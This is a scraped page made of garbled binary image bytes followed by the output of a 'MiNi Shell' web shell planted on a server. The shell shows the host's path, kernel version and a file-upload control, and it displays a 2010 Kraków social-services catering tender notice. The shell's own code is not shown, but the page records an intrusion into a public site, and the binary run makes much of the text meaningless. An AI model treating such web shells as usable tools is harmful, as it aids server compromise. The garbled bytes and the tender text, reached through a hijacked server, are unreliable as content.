JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100609/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100609/148429-N-2010.html

<p class="kh_header"><b>Kraków: przygotowanie i wydanie posiłków uczestnikom projektu socjalnego Grupa Wsparcia Klub Seniora,  projektu Dzień z Tatą 2010 i projektu Samotność nie jest przeznaczeniem</b><br>
<b>Numer ogłoszenia: 148429 - 2010; data zamieszczenia: 09.06.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej w Krakowie , ul. Józefińska 14/002, 30-529 Kraków, woj. małopolskie, tel. 012 6165420, 6165424, faks 012 6165428.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mops.krakow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> przygotowanie i wydanie posiłków uczestnikom projektu socjalnego Grupa Wsparcia Klub Seniora,  projektu Dzień z Tatą 2010 i projektu Samotność nie jest przeznaczeniem.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przygotowanie i wydanie posiłków uczestnikom projektów socjalnych zgodnie z poniższymi wytycznymi:
	
I Część zamówienia
Catering na wycieczkę do Żywca -projekt: grupa wsparcia - Klub seniora
Termin:  24 czerwca 2010r 
Dostawa: do MOPS F1 ul. Rzeźnicza 2 w dniu wycieczki o godz. 6.30.  
Ilość uczestników wycieczki: 50
Menu: kanapki i soczek np. pomarańczowy lub jabłkowy w kartoniku z rurką poj. 200 ml dla każdego uczestnika
Skład kanapki: bułka pszenna - 130 g, masło 10 g, sałata - liść, wędlina - 20 g, ser żółty - 20 g, warzywa - 20 g typu ogórek, pomidor, papryka, rzodkiewka. Każda bułka zapakowana w folię i woreczek.
	
II Część Zamówienia
Catering na  wycieczkę do Tarnowskich Gór -projekt: grupa wsparcia - Klub seniora
Termin: wrzesień 2010r
Dostawa: do MOPS F1 ul. Rzeźnicza 2 w dniu wycieczki o godz. 6.30.  
Ilość uczestników wycieczki: 50
Menu:  kanapki i soczek np. pomarańczowy lub jabłkowy w kartoniku z rurką poj. 200 ml dla każdego uczestnika
Skład kanapki: bułka pszenna - 130 g, masło 10 g, sałata - liść, wędlina - 20 g, ser żółty - 20 g, warzywa - 20 g typu ogórek, pomidor, papryka, rzodkiewka. Każda bułka zapakowana w folię i woreczek.
	
	III część zamówienia
Catering na Andrzejki -projekt: grupa wsparcia - Klub seniora
Termin: 22 listopada 2010 r lub 29 listopada 2010 r:
Miejsce realizacji: Kraków ul. Sudolska 7 MDDPS.
Ilość uczestników: 30
Menu:  kanapeczki na jasnym i ciemnym pieczywie - 50 g (typu koktajlowe) z różnego rodzaju pastami - 20 g, wędliną 10 g, serem 10 g, rybą - 10 g, z dużą ilością warzyw - 20 g, kolorowe i różnorodne, estetycznie i atrakcyjnie podane. Kanapki- po 4 szt. na osobę. 
Ciasteczka - galanteria cukiernicza ok. 150 g na osobę ( typu ciasteczka, galaretki, babeczki, cukierki w czekoladzie), patery z owocami - 100 g na osobę (mandarynki, banany, kiwi, winogrona, ananas, brzoskwinie i inne owoce sezonowe ) 1 patera na 4 osoby. 
Dodatkowo na imprezę nakrycia ceramiczne, bielizna stołowa,  przywiezienie i odbiór potraw i naczyń stołowych 
	
	IV część zamówienia
Catering Wigilia -projekt: grupa wsparcia - Klub seniora
Termin: grudzień 2010
Miejsce realizacji PAL Grzegórzki ul. Semperitowców 13
Ilość uczestników: 30
Menu:
Barszcz czerwony z uszkami lub zupa grzybowa z płatkami - 300 g
Ziemniaki - 150 g, surówka wigilijna z kapusty kiszonej - 150 g i groszku, ryba panierowana - 150 g
Pierogi z kapustą i grzybami - 150 g
Kapusta z grochem - 200 g lub krokiet z kapustą - 200 g
Karp w galarecie - 150 g
Ciasta domowe  - serniki i makowce i owoce - 150 g
Kompot z suszu owocowego - 200 ml
Kawa, herbata (dodatki cytryna, mleko, cukier) - bez ograniczeń ilościowych
Dodatkowo opłatki na Wigilię, nakrycia ceramiczne, bieliznę stołową, wystrój stołów, obsługę kelnerską przyjęcia, przywiezienie i odbiór potraw i naczyń stołowych.
	
V część zamówienia
	Przygotowanie i wydanie posiłku uczestnikom projektu Dzień z Tatą 2010
	Termin: 26 czerwca 2010 roku 
	Miejsce realizacji: os. Złotego Wieku 14 w Krakowie  przed Domem Kultury
 Kużnia - w miejscu wskazanym przez Zamawiającego w godz. 15.30 - 17.30.
	Menu:
kiełbasa z grilla 100 g x 300 sztuk 
chleb krojony-  kromka x 600 sztuk 
ketchup 3 dkg x 300 sztuk  
widelce i tacki plastikowe x 330 sztuk 
butelka wody mineralnej 0,5 l   - 300 sztuk ( w tym 150 sztuk woda gazowana   i 150 sztuk woda niegazowana )
Posiłek powinien być zdatny do bezpośredniego spożycia
	
VI część zamówienia
	Przygotowanie i wydanie posiłku uczestnikom projektu Dzień z Tatą 2010
	Termin: 26 czerwca 2010 roku 
	Miejsce realizacji: os. Złotego Wieku 14 w Krakowie  przed Domem Kultury
 Kużnia -w miejsce wskazane przez Zamawiającego w godz. 15.30 - 19.00
	Menu:
wata cukrowa   250 gr x  250 porcji 
Popcorn solony  200 gr x 250 porcji 
Posiłek powinien być zdatny do bezpośredniego spożycia 
VII część zamówienia
Przygotowanie i wydanie posiłku uczestnikom projektu Samotność nie jest przeznaczeniem - wyjazd integracyjny do Łańcuta, Sieniawy, Leżajska
Termin: 21.06.2010
Miejsce realizacji: lokal na trasie przejazdu autokaru, w Łańcucie lub okolicy w odległości do 25 km od granic miasta.
Ilość uczestników: 43
Menu:
I DANIE
Rosół drobiowy 350ml	lub	Zupa pomidorowa 350ml
II DANIE
Kotlet drobiowy 130g 	lub 	Kotlet De Volaille 130g
Młode ziemniaki z wody 350g
Zestaw surówek (buraczków ćwikłowych, marchewki oraz białej kapusty) 300g
	DESER:
Deser lodowy z kawałkami owocowymi, sosem owocowym i bita śmietaną podawane w pucharkach 350g lub Szarlotka z płatkami migdałowymi 100g + kawa 0.25 l
2.	Warunki płatności: 
Część I-VI - w terminie do 14 dni od daty przyjęcia faktury przez Zamawiającego, przelewem na konto Wykonawcy.
Część VII -  gotówką w dniu realizacji usługi
3.	Warunki dodatkowe: 
1)	Wykonawca zapewni właściwą jakość przygotowywanego posiłku z uwzględnieniem temperatury i innych wymogów ustawy o warunkach zdrowotnych żywności i żywienia oraz przepisów ustawy o Państwowej Inspekcji Sanitarnej
2)	Wykonawca dostarczy posiłki  własnym transportem, w miejsce określone przez Zamawiającego w rozdz.II pkt 1.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający może udzielić Wykonawcy zamówień uzupełniających w trybie zamówienia z wolnej ręki w okresie 3 lat od udzielenia zamówienia podstawowego, stanowiących nie więcej niż 50 % wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówienia</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 55.30.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany mogą dotyczyć takich kwestii jak: termin realizacji zamówienia, warunki płatności oraz miejsce realizacji zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mops.krakow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> MOPS Kraków ul.Józefińska 14 pok.002.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.06.2010 godzina 10:00, miejsce: MOPS Kraków ul.Józefińska 14 dziennik podawczy.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com